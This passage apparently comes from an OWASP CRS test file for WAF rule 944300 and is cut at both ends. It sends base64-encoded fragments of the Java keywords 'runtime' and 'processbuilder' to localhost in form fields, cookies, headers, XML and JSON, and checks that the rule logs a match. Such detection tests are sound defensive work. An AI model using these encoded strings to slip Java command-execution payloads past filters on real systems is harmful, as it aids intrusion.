"HTTP/1.0" - data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" +meta: + author: "spartantri" + enabled: true + name: "944300.yaml" + description: "Positive tests for rule 944300" +tests: + - test_title: 944300-1 + desc: "Argument test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-2 + desc: "Argument name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-3 + desc: "Cookie test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-4 + desc: "Cookie name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + 
output: + log_contains: "id \"944300\"" + - test_title: 944300-5 + desc: "Request header test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-6 + desc: "XML attribute value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-7 + desc: "XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-8 + desc: "Nested XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-9 + desc: "Content-Type text/plain includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-10 + desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-11 + desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - 
test_title: 944300-12 + desc: "Argument test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-13 + desc: "Argument name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-14 + desc: "Cookie test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-15 + desc: "Cookie name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-16 + desc: "Request header test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-17 + desc: "XML attribute value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-18 + desc: "XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-19 + desc: "Nested XML element value includes keyword HJ1bnRpbWU" + stages: + - 
stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-20 + desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-21 + desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-22 + desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-23 + desc: "Argument test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-24 + desc: "Argument name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-25 + desc: "Cookie test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-26 + desc: "Cookie name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-27 + desc: "Request header test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-28 + desc: "XML attribute value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-29 + desc: "XML element value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-30 + desc: "Nested XML element value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-31 + desc: "Content-Type text/plain includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-32 + desc: "Content-Type application/json arg value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-33 + desc: "Content-Type application/json arg name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-34 + desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-35 + desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-36 + desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + 
data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-37 + desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-38 + desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-39 + desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-40 + desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-41 + desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-42 + desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-43 + desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-44 + desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-45 + desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-46 + desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-47 + desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-48 + desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-49 + desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-50 + desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-51 + desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-52 + desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 